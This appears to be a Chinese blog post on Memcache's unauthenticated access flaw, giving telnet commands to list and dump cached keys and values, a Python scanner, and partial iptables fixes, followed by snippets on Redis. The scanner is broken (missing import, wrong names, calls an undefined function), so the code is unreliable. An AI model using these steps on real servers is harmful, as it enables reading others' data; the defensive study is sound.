Memcache未授權訪問漏洞

2021-08-21 20:18:57 字數 1597 閱讀 4077

memcached 分布式快取系統,預設的 11211 埠不需要密碼即可訪問,黑客直接訪問即可獲取資料庫中所有資訊,造成嚴重的資訊洩露。

0x00 memcache安裝

2、在cmd命令介面)下輸入 'memcached.exe -d install' 進行安裝

3、 啟動 memcached.exe -d start。note: 以後memcached將作為windows的乙個服務每次開機時自動啟動。這樣伺服器端已經安裝完畢了。

0x01 漏洞驗證

telnet 10.9.9.120

無需使用者名稱密碼,可以直接連線memcache 服務的11211埠。

# stats  //檢視memcache 服務狀態

# stats items //檢視所有items

# stats cachedump 32 0 //獲得快取key

# get :state:264861539228401373:261588 //通過key讀取相應value ,獲得實際快取內容,造成敏感資訊洩露

0x02 python未授權訪問指令碼

#! /usr/bin/env python

# _*_ coding:utf-8 _*_

def memcache_check(ip, port=11211, timeout=5):

try:

socket.setdefaulttimeout(timeout)

s = socket.socket(socket.af_inet, socket.sock_stream)

s.connect((ip, int(port)))

s.send("stats\r\n")

result = s.recv(1024)

if "stat version" in result:

print '[+] memcache unauthorized: ' +ip+':'+str(port)

except exception, e:

pass

if __name__ == '__main__':

elasticsearch_check("127.0.0.1")

0x03 修復方案:因memcache無許可權控制功能,所以需要使用者對訪問**進行限制。

方案一:

方案二:(注意:請謹慎配置iptables規則)

如果memcache服務需要對外提供服務,則可以通過iptables進行訪問控制,下面是只允許本機訪問:

上述規則的意思是只允許192.168.0.2這個ip對11211埠進行訪問。

最後

windows下的memcache安裝  

memcache未授權訪問

memcache是國外社群 live journal的開發團隊開發的高效能的分布式記憶體快取伺服器。一般的使用目的是,通過快取資料庫查詢結果,減少資料庫訪問次數,以提高動態web應用的速度 提高擴充套件性。memcache的預設埠是11211,不需要密碼即可訪問,黑客直接訪問即可獲取資料庫中所有資訊...

Redis未授權訪問漏洞

一 漏洞描述和危害 redis因配置不當可以未授權訪問,被攻擊者惡意利用。攻擊者無需認證訪問到內部資料,可能導致敏感資訊洩露,黑客也可以惡意執行flushall來清空所有資料。攻擊者可通過eval執行lua 或通過資料備份功能往磁碟寫入後門檔案。如果redis以root身份執行,黑客可以給root賬...

Redis未授權訪問漏洞

一 漏洞描述和危害 redis因配置不當可以未授權訪問,被攻擊者惡意利用。攻擊者無需認證訪問到內部資料,可能導致敏感資訊洩露,黑客也可以惡意執行flushall來清空所有資料。攻擊者可通過eval執行lua 或通過資料備份功能往磁碟寫入後門檔案,如果redis以root身份執行,黑客可以給root賬...